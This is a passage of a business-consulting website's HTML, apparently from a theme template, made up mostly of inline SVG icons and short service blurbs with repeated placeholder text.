	<path d="M451.564,173.339c5.125,0,10.316-1.303,15.064-4.044c6.993-4.038,11.995-10.557,14.085-18.356   c2.09-7.8,1.018-15.947-3.021-22.94v0c-4.037-6.993-10.556-11.995-18.355-14.085c-7.8-2.089-15.946-1.018-22.939,3.02   c-14.436,8.334-19.399,26.859-11.065,41.296C430.926,167.918,441.108,173.34,451.564,173.339z M443.898,129.925   c2.347-1.355,4.951-2.047,7.591-2.047c1.322,0,2.654,0.174,3.966,0.525c3.93,1.053,7.214,3.573,9.248,7.096v0   c2.034,3.522,2.574,7.627,1.521,11.557s-3.573,7.214-7.096,9.248c-7.271,4.199-16.604,1.698-20.806-5.574   C434.124,143.458,436.625,134.124,443.898,129.925z"></path>
</g>
</svg>        	
        		+        	
        	<p>Years of Experience <br>& Business Consulting</p>      				        
			<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 470 470"><g><path d="m429.591,418.378l-62.223-150.218c-1.585-3.826-5.972-5.645-9.799-4.059s-5.645,5.973-4.059,9.799l56.251,135.801-51.309-14.867c-3.368-0.977-6.965,0.513-8.656,3.586l-25.769,46.793-60.357-145.716c69.663-13.434 122.447-74.853 122.447-148.378 0.001-83.327-67.79-151.119-151.117-151.119s-151.119,67.792-151.119,151.119c0,33.751 11.124,64.951 29.896,90.133l-73.368,177.126c-1.103,2.664-0.582,5.724 1.341,7.872 1.922,2.148 4.907,3.004 7.676,2.202l60.533-17.541 30.4,55.207c1.324,2.403 3.847,3.882 6.568,3.882 0.138,0 0.277-0.004 0.416-0.011 2.879-0.16 5.411-1.955 6.515-4.619l58.136-140.353c1.585-3.827-0.232-8.214-4.059-9.799-3.827-1.585-8.214,0.232-9.799,4.059l-52.165,125.936-25.767-46.793c-1.692-3.073-5.291-4.563-8.657-3.586l-51.308,14.867 64.397-155.469c27.598,29.52 66.86,48.005 110.364,48.005 4.491,0 8.933-0.209 13.325-0.594l67.818,163.727c1.103,2.664 3.636,4.459 6.514,4.618 0.14,0.008 0.278,0.012 0.417,0.012 2.721,0 5.244-1.479 6.567-3.882l30.401-55.207 60.533,17.541c2.771,0.803 5.753-0.054 7.676-2.202 1.923-2.148 2.443-5.208 1.34-7.872zm-330.71-267.259c2.84217e-14-75.056 61.063-136.119 136.119-136.119 75.056,0 136.118,61.063 136.118,136.119s-61.062,136.118-136.118,136.118c-75.056,0-136.119-61.062-136.119-136.118z"></path><path d="m321.659,122.961c-0.863-2.658-3.135-4.616-5.892-5.079l-50.467-8.469-23.649-45.379c-1.292-2.479-3.855-4.034-6.651-4.034-2.795,0-5.359,1.555-6.651,4.034l-23.65,45.379-50.466,8.469c-2.757,0.462-5.028,2.42-5.892,5.079-0.864,2.659-0.178,5.577 1.781,7.572l35.85,36.515-7.54,50.614c-0.412,2.765 0.748,5.529 3.01,7.173 2.26,1.642 5.249,1.891 7.751,0.646l45.807-22.812 45.806,22.812c1.059,0.527 2.203,0.787 3.343,0.787 1.557,0 3.104-0.484 4.409-1.432 2.262-1.644 3.422-4.408 3.01-7.173l-7.539-50.614 35.85-36.516c1.958-1.995 2.644-4.913 1.78-7.572zm-50.951,36.244c-1.648,1.679-2.413,4.033-2.066,6.359l5.97,40.074-36.268-18.061c-1.054-0.524-2.198-0.787-3.344-0.787-1.145,0-2.291,0.262-3.343,0.787l-36.268,18.061 5.97-40.074c0.347-2.326-0.418-4.681-2.066-6.359l-28.385-28.912 39.957-6.706c2.32-0.389 4.323-1.844 5.41-3.93l18.725-35.929 18.725,35.93c1.088,2.086 3.09,3.541 5.41,3.93l39.958,6.706-28.385,28.911z"></path><path d="m348.612,158.684c-4.107-0.549-7.877,2.343-8.42,6.45-6.957,52.507-52.18,92.104-105.192,92.104-58.514,0-106.119-47.604-106.119-106.119s47.605-106.119 106.119-106.119c53.013,0 98.235,39.596 105.192,92.104 0.543,4.107 4.32,7.001 8.42,6.45 4.105-0.544 6.994-4.314 6.449-8.42-7.94-59.936-59.555-105.134-120.061-105.134-66.785,0-121.119,54.333-121.119,121.119s54.334,121.118 121.119,121.118c60.506,0 112.121-45.198 120.062-105.134 0.544-4.105-2.344-7.875-6.45-8.419z"></path></g></svg>        	
        		+        	
        	<p>Business Excellence <br>Awards Achieved</p>      				        
	        Improve Your Business	        <h3>We Offer Great<br> Number of Finance Services</h3>	    
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M488.399,492h-21.933V173.536c0-14.823-12.06-26.882-26.882-26.882H390.56c-14.823,0-26.882,12.06-26.882,26.882V492    h-55.692V317.825c0-14.823-12.059-26.882-26.882-26.882H232.08c-14.823,0-26.882,12.06-26.882,26.882V492h-55.692v-90.204    c0-14.823-12.06-26.882-26.882-26.882H73.599c-14.823,0-26.882,12.06-26.882,26.882V492H23.601c-5.523,0-10,4.477-10,10    s4.477,10,10,10h464.798c5.523,0,10-4.477,10-10S493.922,492,488.399,492z M129.504,492H66.716v-90.204    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z M287.985,492h-62.788V317.825    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.794,0,6.882,3.087,6.882,6.882V492z M446.466,492h-62.788V173.536    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M466.442,10.516c0.14-2.729-0.82-5.504-2.904-7.588c-2.084-2.084-4.859-3.045-7.588-2.904    C455.789,0.017,455.63,0,455.466,0h-60.5c-5.523,0-10,4.477-10,10s4.477,10,10,10h37.357l-98.857,98.858l-37.28-37.28    c-1.875-1.875-4.419-2.929-7.071-2.929c-2.652,0-5.196,1.054-7.071,2.929l-179.769,179.77c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.951,4.512,2.927,7.071,2.927s5.119-0.976,7.071-2.929L289.115,102.79l37.28,37.28c3.905,3.905,10.237,3.905,14.143,0    L446.466,34.143v33.81c0,5.523,4.477,10,10,10s10-4.477,10-10V11C466.466,10.837,466.449,10.678,466.442,10.516z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="75.64" cy="303.31" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5>Marketing Research</h5>				<p>It is almost impossible to make strategic decisions without deep knowledge</p>			
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<circle cx="10.06" cy="500.446" r="10.06"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="267.005" cy="245.308" r="10.04"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M398.479,118.032c-8.071-8.072-18.802-12.516-30.216-12.516c-11.414,0-22.146,4.446-30.216,12.516    c-16.661,16.662-16.661,43.772,0,60.433c8.332,8.331,19.272,12.495,30.216,12.495c10.941,0,21.886-4.166,30.216-12.495    C415.14,161.803,415.14,134.693,398.479,118.032z M384.282,164.266c-8.833,8.832-23.206,8.832-32.037,0    c-8.833-8.832-8.833-23.204,0-32.037c4.279-4.279,9.967-6.635,16.018-6.635c6.051,0,11.739,2.356,16.018,6.635    C393.114,141.062,393.114,155.434,384.282,164.266z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M125.409,411.45c-4.964-2.472-10.99-0.451-13.462,4.512l-11.958,24.015c-5.2,10.441-15.658,17.423-27.296,18.219    l-13.908,0.952c-2.351,0.157-3.897-1.014-4.612-1.729s-1.889-2.264-1.729-4.613l0.952-13.907    c0.797-11.637,7.779-22.096,18.219-27.296l24.014-11.958c4.964-2.472,6.984-8.499,4.512-13.462    c-2.471-4.963-8.498-6.984-13.462-4.512l-24.014,11.958c-16.792,8.362-28.02,25.182-29.302,43.898l-0.952,13.907    c-0.514,7.507,2.242,14.863,7.562,20.183c4.898,4.898,11.523,7.624,18.403,7.624c0.591,0,1.186-0.02,1.78-0.061l13.908-0.952    c18.716-1.281,35.536-12.508,43.898-29.302l11.958-24.014C132.392,419.948,130.372,413.922,125.409,411.45z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M505.07,8.18c-4.711-4.641-11.201-7.068-17.793-6.639l-9.348,0.596c-83.819,5.351-162.262,45.81-215.215,111.004    L240.71,140.23l-57.583-1.691c-0.098-0.003-0.197-0.004-0.294-0.004c-45.668,0-88.603,17.784-120.896,50.076L2.959,247.59    c-2.805,2.805-3.696,7-2.272,10.702c1.424,3.703,4.894,6.221,8.856,6.423l124.844,6.414l-5.09,6.267    c-2.565,3.159-2.971,7.553-1.026,11.127c1.956,3.596,4.006,7.135,6.144,10.617l-29.606,35.147    c-2.531,3.005-3.076,7.211-1.397,10.763c6.467,13.665,15.05,25.943,25.514,36.493c10.718,10.808,23.251,19.646,37.249,26.271    c1.368,0.648,2.835,0.965,4.293,0.965c2.261,0,4.503-0.764,6.327-2.243c6.378-5.174,13.731-11.311,20.843-17.245    c5.069-4.23,10.255-8.557,15.102-12.547c2.893,1.741,5.822,3.429,8.795,5.046c1.504,0.818,3.153,1.221,4.796,1.221    c2.186,0,4.358-0.712,6.156-2.108l6.843-5.31l6.442,125.37c0.204,3.962,2.721,7.432,6.423,8.856c1.172,0.45,2.39,0.67,3.6,0.67    c2.615,0,5.183-1.023,7.101-2.942l58.979-58.979c32.293-32.293,50.076-75.227,50.076-120.896v-54.995l23.267-18.055    c69.729-54.11,112.196-135.704,116.512-223.862l0.239-4.886C512.295,19.27,509.779,12.822,505.07,8.18z M33.123,245.822    l43.012-43.012c28.465-28.465,66.303-44.157,106.553-44.196l42.085,1.236l-74.71,91.98L33.123,245.822z M184.774,373.874    c-5.241,4.372-10.614,8.856-15.6,12.957c-9.644-5.223-18.368-11.74-25.992-19.428c-7.384-7.445-13.669-15.922-18.737-25.26    l21.676-25.733c6.554,8.793,13.728,17.122,21.478,24.925c0.006,0.006,0.012,0.011,0.018,0.017    c0.002,0.002,0.004,0.005,0.006,0.007c0.003,0.003,0.006,0.005,0.009,0.008c8.593,8.648,17.836,16.584,27.641,23.761    C191.811,368.002,188.264,370.962,184.774,373.874z M351.875,327.672c0,40.305-15.695,78.197-44.196,106.698l-43.012,43.012    l-6.002-116.792l93.209-72.33V327.672z M491.678,29.779c-4.029,82.297-43.673,158.467-108.767,208.98l-157.46,122.189    c-13.058-7.63-25.229-16.639-36.368-26.846l53.086-53.086c3.92-3.92,3.92-10.278,0-14.199c-3.921-3.921-10.278-3.921-14.199,0    l-53.036,53.036c-9.751-10.795-18.387-22.541-25.74-35.104L278.3,125.8C327.732,64.941,400.96,27.171,479.207,22.177l9.348-0.596    c1.225-0.076,2.045,0.532,2.423,0.904c0.377,0.371,1,1.178,0.94,2.409L491.678,29.779z"></path>
	</g>
</g>
</svg>	        
				<h5>Оrganizational Audit</h5>				<p>It is almost impossible to make strategic decisions without deep knowledge</p>			
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="254.4" cy="237.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="172.07" cy="55.21" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="290.4" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="343.47" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M341.92,254.731c34.292-22.056,54.765-59.534,54.765-100.256V64.863c25.227-2.897,44.887-24.371,44.887-50.36V10    c0-5.522-4.478-10-10-10H80.429c-5.522,0-10,4.478-10,10v4.503c0,26.1,19.826,47.651,45.207,50.401v89.572    c0,40.722,20.473,78.2,54.765,100.257c0.466,0.3,0.702,0.726,0.702,1.268c0,0.542-0.236,0.968-0.702,1.269    c-34.292,22.056-54.765,59.534-54.765,100.256v89.272c-24.94,0.077-45.207,20.386-45.207,45.344V502c0,5.522,4.478,10,10,10    h351.143c5.522,0,10-4.478,10-10v-9.859c0-24.85-20.094-45.087-44.887-45.336v-89.28c0-40.722-20.473-78.2-54.765-100.257    c-0.466-0.3-0.702-0.726-0.702-1.268S341.454,255.032,341.92,254.731z M396.224,466.793c13.929,0,25.271,11.295,25.347,25.207    H90.429c0.076-13.912,11.418-25.207,25.348-25.207h9.839c0.01,0,0.019,0.002,0.028,0.002c0.011,0,0.023-0.002,0.034-0.002h261.007    H396.224z M168.265,446.793l87.888-43.633l87.673,43.633H168.265z M331.102,274.089c28.543,18.358,45.583,49.549,45.583,83.436    v83.282l-116.069-57.766c-2.803-1.396-6.099-1.396-8.901-0.005l-116.078,57.628v-83.14c0-33.887,17.04-65.077,45.583-83.435    c6.189-3.98,9.884-10.743,9.884-18.09s-3.694-14.109-9.884-18.089c-28.543-18.358-45.583-49.549-45.583-83.436V56.94    c0.099-0.564,0.16-1.141,0.16-1.733c0-5.522-4.478-10-10-10h-4.663c-15.055,0-27.613-10.89-30.211-25.207h330.156    c-2.598,14.317-15.156,25.207-30.212,25.207h-172.63c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h158.447v89.269    c0,33.887-17.04,65.077-45.583,83.435c-6.189,3.98-9.884,10.743-9.884,18.09C321.217,263.348,324.911,270.109,331.102,274.089z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M338.63,159.11h-60.178c-11.712,0-18.942,4.568-23.031,8.58c-5.659-5.049-13.826-8.58-25.07-8.58h-60.177    c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h60.177c13.767,0,15.557,8.457,15.683,12.13c0,0.049,0.001,0.092,0.002,0.127    c0.133,5.433,4.576,9.756,9.995,9.756c0.041,0,0.083,0,0.124-0.001c5.475-0.066,9.878-4.523,9.878-9.999c0-0.07,0-0.14-0.001-0.21    c0.021-4.447,1.683-11.803,12.421-11.803h60.178c5.521,0,9.999-4.477,9.999-10C348.63,163.588,344.152,159.11,338.63,159.11z"></path>
	</g>
</g>
</svg>	        
				<h5>Business Consulting</h5>				<p>It is almost impossible to make strategic decisions without deep knowledge</p>			
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="254.4" cy="237.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="172.07" cy="55.21" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="290.4" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="343.47" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M341.92,254.731c34.292-22.056,54.765-59.534,54.765-100.256V64.863c25.227-2.897,44.887-24.371,44.887-50.36V10    c0-5.522-4.478-10-10-10H80.429c-5.522,0-10,4.478-10,10v4.503c0,26.1,19.826,47.651,45.207,50.401v89.572    c0,40.722,20.473,78.2,54.765,100.257c0.466,0.3,0.702,0.726,0.702,1.268c0,0.542-0.236,0.968-0.702,1.269    c-34.292,22.056-54.765,59.534-54.765,100.256v89.272c-24.94,0.077-45.207,20.386-45.207,45.344V502c0,5.522,4.478,10,10,10    h351.143c5.522,0,10-4.478,10-10v-9.859c0-24.85-20.094-45.087-44.887-45.336v-89.28c0-40.722-20.473-78.2-54.765-100.257    c-0.466-0.3-0.702-0.726-0.702-1.268S341.454,255.032,341.92,254.731z M396.224,466.793c13.929,0,25.271,11.295,25.347,25.207    H90.429c0.076-13.912,11.418-25.207,25.348-25.207h9.839c0.01,0,0.019,0.002,0.028,0.002c0.011,0,0.023-0.002,0.034-0.002h261.007    H396.224z M168.265,446.793l87.888-43.633l87.673,43.633H168.265z M331.102,274.089c28.543,18.358,45.583,49.549,45.583,83.436    v83.282l-116.069-57.766c-2.803-1.396-6.099-1.396-8.901-0.005l-116.078,57.628v-83.14c0-33.887,17.04-65.077,45.583-83.435    c6.189-3.98,9.884-10.743,9.884-18.09s-3.694-14.109-9.884-18.089c-28.543-18.358-45.583-49.549-45.583-83.436V56.94    c0.099-0.564,0.16-1.141,0.16-1.733c0-5.522-4.478-10-10-10h-4.663c-15.055,0-27.613-10.89-30.211-25.207h330.156    c-2.598,14.317-15.156,25.207-30.212,25.207h-172.63c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h158.447v89.269    c0,33.887-17.04,65.077-45.583,83.435c-6.189,3.98-9.884,10.743-9.884,18.09C321.217,263.348,324.911,270.109,331.102,274.089z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M338.63,159.11h-60.178c-11.712,0-18.942,4.568-23.031,8.58c-5.659-5.049-13.826-8.58-25.07-8.58h-60.177    c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h60.177c13.767,0,15.557,8.457,15.683,12.13c0,0.049,0.001,0.092,0.002,0.127    c0.133,5.433,4.576,9.756,9.995,9.756c0.041,0,0.083,0,0.124-0.001c5.475-0.066,9.878-4.523,9.878-9.999c0-0.07,0-0.14-0.001-0.21    c0.021-4.447,1.683-11.803,12.421-11.803h60.178c5.521,0,9.999-4.477,9.999-10C348.63,163.588,344.152,159.11,338.63,159.11z"></path>
	</g>
</g>
</svg>	        
				<h5>Business Consulting</h5>				<p>It is almost impossible to make strategic decisions without deep knowledge</p>			
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M436.275,39.807H304.797C300.155,17.119,280.039,0,256,0s-44.156,17.119-48.798,39.807H75.725    c-14.771,0-26.789,12.018-26.789,26.789V351.16c0,14.771,12.017,26.789,26.789,26.789H200.63l-40.566,120.866    c-1.757,5.235,1.063,10.904,6.299,12.662c1.055,0.354,2.128,0.522,3.183,0.522c4.179,0,8.076-2.641,9.479-6.821l42.702-127.229    h68.546l42.702,127.229c1.403,4.181,5.3,6.821,9.479,6.821c1.055,0,2.128-0.169,3.183-0.522c5.236-1.758,8.056-7.427,6.299-12.662    l-40.566-120.866h124.905c14.771,0,26.789-12.018,26.789-26.789V66.596C463.063,51.824,451.046,39.807,436.275,39.807z M256,20    c12.93,0,23.963,8.274,28.082,19.807h-56.163C232.038,28.274,243.071,20,256,20z M443.063,351.16c0,3.743-3.045,6.789-6.789,6.789    h-26.121v-142.56c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10V357.95H359.39V245.979c0-5.522-4.477-10-10-10    c-5.523,0-10,4.478-10,10v111.97h-28.084v-79.255c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v79.255h-25.308V253.277    c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v104.672h-29.037v-55.023c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v55.023    h-23.221v-50.985c0-5.522-4.477-10-10-10s-10,4.478-10,10v50.985h-26.777v-39.337c0-5.522-4.477-10-10-10s-10,4.478-10,10v39.337    h-31.24c-3.743,0-6.789-3.046-6.789-6.789V66.596c0-3.743,3.045-6.789,6.789-6.789h140.468h79.614h140.468    c3.743,0,6.789,3.046,6.789,6.789V351.16z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M410.105,106.884c-0.013-0.137-0.039-0.269-0.058-0.404c-0.026-0.188-0.049-0.377-0.086-0.564    c-0.031-0.158-0.075-0.312-0.114-0.467c-0.04-0.161-0.076-0.323-0.124-0.482c-0.046-0.153-0.104-0.301-0.158-0.451    c-0.056-0.158-0.109-0.317-0.173-0.473c-0.058-0.139-0.125-0.272-0.189-0.407c-0.075-0.161-0.147-0.323-0.231-0.48    c-0.068-0.127-0.146-0.249-0.22-0.373c-0.093-0.156-0.181-0.314-0.283-0.466c-0.089-0.134-0.19-0.259-0.285-0.388    c-0.098-0.133-0.191-0.268-0.297-0.397c-0.179-0.218-0.37-0.425-0.567-0.627c-0.033-0.033-0.06-0.07-0.093-0.103    c-0.032-0.032-0.068-0.059-0.1-0.09c-0.203-0.198-0.412-0.39-0.631-0.57c-0.122-0.1-0.25-0.188-0.376-0.281    c-0.136-0.102-0.269-0.207-0.41-0.302c-0.144-0.096-0.293-0.179-0.44-0.267c-0.133-0.08-0.264-0.163-0.401-0.237    c-0.146-0.078-0.296-0.144-0.445-0.214c-0.147-0.07-0.292-0.143-0.444-0.206c-0.141-0.058-0.285-0.105-0.427-0.156    c-0.166-0.06-0.329-0.123-0.499-0.174c-0.139-0.042-0.279-0.072-0.419-0.108c-0.176-0.045-0.35-0.094-0.53-0.129    c-0.156-0.031-0.314-0.049-0.471-0.072c-0.166-0.025-0.329-0.055-0.497-0.072c-0.267-0.026-0.535-0.036-0.804-0.041    c-0.06-0.001-0.118-0.009-0.178-0.009h-43.197c-5.523,0-10,4.478-10,10s4.477,10,10,10h19.054l-83.028,83.028l-21.797-21.798    c-1.875-1.875-4.419-2.929-7.071-2.929s-5.196,1.054-7.071,2.929l-72.161,72.162l-21.543-21.543    c-3.905-3.904-10.237-3.904-14.142,0l-36.492,36.492c-3.905,3.905-3.905,10.237,0,14.143c1.953,1.952,4.512,2.929,7.071,2.929    c2.559,0,5.119-0.977,7.071-2.929l29.42-29.421l21.543,21.542c3.905,3.904,10.237,3.904,14.142,0l72.161-72.161l21.797,21.798    c1.875,1.875,4.419,2.929,7.071,2.929s5.196-1.054,7.071-2.929l90.099-90.099v19.054c0,5.522,4.477,10,10,10    c5.523,0,10-4.478,10-10v-43.191C410.155,107.546,410.138,107.214,410.105,106.884z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="107.869" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="148.639" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="189.409" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5>Project Management</h5>				<p>It is almost impossible to make strategic decisions without deep knowledge</p>			
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M436.275,39.807H304.797C300.155,17.119,280.039,0,256,0s-44.156,17.119-48.798,39.807H75.725    c-14.771,0-26.789,12.018-26.789,26.789V351.16c0,14.771,12.017,26.789,26.789,26.789H200.63l-40.566,120.866    c-1.757,5.235,1.063,10.904,6.299,12.662c1.055,0.354,2.128,0.522,3.183,0.522c4.179,0,8.076-2.641,9.479-6.821l42.702-127.229    h68.546l42.702,127.229c1.403,4.181,5.3,6.821,9.479,6.821c1.055,0,2.128-0.169,3.183-0.522c5.236-1.758,8.056-7.427,6.299-12.662    l-40.566-120.866h124.905c14.771,0,26.789-12.018,26.789-26.789V66.596C463.063,51.824,451.046,39.807,436.275,39.807z M256,20    c12.93,0,23.963,8.274,28.082,19.807h-56.163C232.038,28.274,243.071,20,256,20z M443.063,351.16c0,3.743-3.045,6.789-6.789,6.789    h-26.121v-142.56c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10V357.95H359.39V245.979c0-5.522-4.477-10-10-10    c-5.523,0-10,4.478-10,10v111.97h-28.084v-79.255c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v79.255h-25.308V253.277    c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v104.672h-29.037v-55.023c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v55.023    h-23.221v-50.985c0-5.522-4.477-10-10-10s-10,4.478-10,10v50.985h-26.777v-39.337c0-5.522-4.477-10-10-10s-10,4.478-10,10v39.337    h-31.24c-3.743,0-6.789-3.046-6.789-6.789V66.596c0-3.743,3.045-6.789,6.789-6.789h140.468h79.614h140.468    c3.743,0,6.789,3.046,6.789,6.789V351.16z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M410.105,106.884c-0.013-0.137-0.039-0.269-0.058-0.404c-0.026-0.188-0.049-0.377-0.086-0.564    c-0.031-0.158-0.075-0.312-0.114-0.467c-0.04-0.161-0.076-0.323-0.124-0.482c-0.046-0.153-0.104-0.301-0.158-0.451    c-0.056-0.158-0.109-0.317-0.173-0.473c-0.058-0.139-0.125-0.272-0.189-0.407c-0.075-0.161-0.147-0.323-0.231-0.48    c-0.068-0.127-0.146-0.249-0.22-0.373c-0.093-0.156-0.181-0.314-0.283-0.466c-0.089-0.134-0.19-0.259-0.285-0.388    c-0.098-0.133-0.191-0.268-0.297-0.397c-0.179-0.218-0.37-0.425-0.567-0.627c-0.033-0.033-0.06-0.07-0.093-0.103    c-0.032-0.032-0.068-0.059-0.1-0.09c-0.203-0.198-0.412-0.39-0.631-0.57c-0.122-0.1-0.25-0.188-0.376-0.281    c-0.136-0.102-0.269-0.207-0.41-0.302c-0.144-0.096-0.293-0.179-0.44-0.267c-0.133-0.08-0.264-0.163-0.401-0.237    c-0.146-0.078-0.296-0.144-0.445-0.214c-0.147-0.07-0.292-0.143-0.444-0.206c-0.141-0.058-0.285-0.105-0.427-0.156    c-0.166-0.06-0.329-0.123-0.499-0.174c-0.139-0.042-0.279-0.072-0.419-0.108c-0.176-0.045-0.35-0.094-0.53-0.129    c-0.156-0.031-0.314-0.049-0.471-0.072c-0.166-0.025-0.329-0.055-0.497-0.072c-0.267-0.026-0.535-0.036-0.804-0.041    c-0.06-0.001-0.118-0.009-0.178-0.009h-43.197c-5.523,0-10,4.478-10,10s4.477,10,10,10h19.054l-83.028,83.028l-21.797-21.798    c-1.875-1.875-4.419-2.929-7.071-2.929s-5.196,1.054-7.071,2.929l-72.161,72.162l-21.543-21.543    c-3.905-3.904-10.237-3.904-14.142,0l-36.492,36.492c-3.905,3.905-3.905,10.237,0,14.143c1.953,1.952,4.512,2.929,7.071,2.929    c2.559,0,5.119-0.977,7.071-2.929l29.42-29.421l21.543,21.542c3.905,3.904,10.237,3.904,14.142,0l72.161-72.161l21.797,21.798    c1.875,1.875,4.419,2.929,7.071,2.929s5.196-1.054,7.071-2.929l90.099-90.099v19.054c0,5.522,4.477,10,10,10    c5.523,0,10-4.478,10-10v-43.191C410.155,107.546,410.138,107.214,410.105,106.884z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="107.869" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="148.639" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="189.409" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5>Project Management</h5>				<p>It is almost impossible to make strategic decisions without deep knowledge</p>			
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M509.07,194.061L414.3,99.29c-3.906-3.905-10.24-3.906-14.148,0c-3.906,3.906-3.906,10.24,0,14.148l87.697,87.696    l-51.274,51.273c-1.571,1.57-4.126,1.57-5.695,0l-101.25-101.249c-1.571-1.57-1.571-4.125,0-5.696l34.411-34.413    c3.906-3.906,3.906-10.24,0-14.147c-3.907-3.906-10.239-3.906-14.148,0l-34.411,34.411c-7.128,7.129-8.818,17.655-5.1,26.412    l-11.638,11.638h-44.877h-3.537h-32.955l-14.682-14.682c0.564-2.058,0.862-4.201,0.862-6.392c0-6.42-2.501-12.456-7.04-16.995    l-33.481-33.481c-3.907-3.906-10.239-3.906-14.148,0c-3.906,3.906-3.906,10.24,0,14.148l33.482,33.481    c1.026,1.026,1.18,2.225,1.18,2.847s-0.153,1.821-1.181,2.848l-2.786,2.786l-98.495,98.471c-0.032,0.032-0.059,0.067-0.09,0.099    c-0.998,0.923-2.128,1.073-2.727,1.073c-0.623,0-1.822-0.153-2.848-1.179L24.15,201.114l88.876-88.875    c3.906-3.906,3.906-10.24,0-14.147s-10.238-3.906-14.148,0L2.93,194.041c-3.906,3.906-3.906,10.24,0,14.147l58.346,58.347    c4.687,4.686,10.841,7.028,16.995,7.028c2.826,0,5.646-0.518,8.329-1.507l32.843,32.843c-2.55,4.784-4,10.237-4,16.025    c0,18.853,15.338,34.191,34.191,34.191c0.042,0,0.084-0.003,0.126-0.003c0,0.002,0,0.004,0,0.006    c0,18.811,15.269,34.119,34.064,34.188c0,0.015-0.001,0.029-0.001,0.044c0,18.853,15.338,34.191,34.191,34.191    c5.8,0,11.265-1.456,16.055-4.015l12.227,12.227c5.732,5.732,13.354,8.889,21.46,8.889c8.107,0,15.729-3.157,21.46-8.889    c5.427-5.427,8.546-12.548,8.862-20.171c7.393-0.368,14.678-3.368,20.311-9.002c5.952-5.952,9.166-13.866,9.051-22.282    c0-0.018-0.001-0.035-0.001-0.053c8.703-0.54,16.71-4.354,22.63-10.805c5.951-6.482,8.896-14.656,8.87-22.81    c8.37-0.241,16.201-3.613,22.146-9.559c6.202-6.201,9.603-14.447,9.573-23.218c-0.017-5.164-1.229-10.132-3.49-14.608l32.81-30    c4.115,2.876,8.927,4.335,13.749,4.335c6.154,0,12.309-2.343,16.995-7.027l58.346-58.347    C512.976,204.301,512.976,197.967,509.07,194.061z M149.635,335.11c-7.822,0-14.185-6.363-14.185-14.185    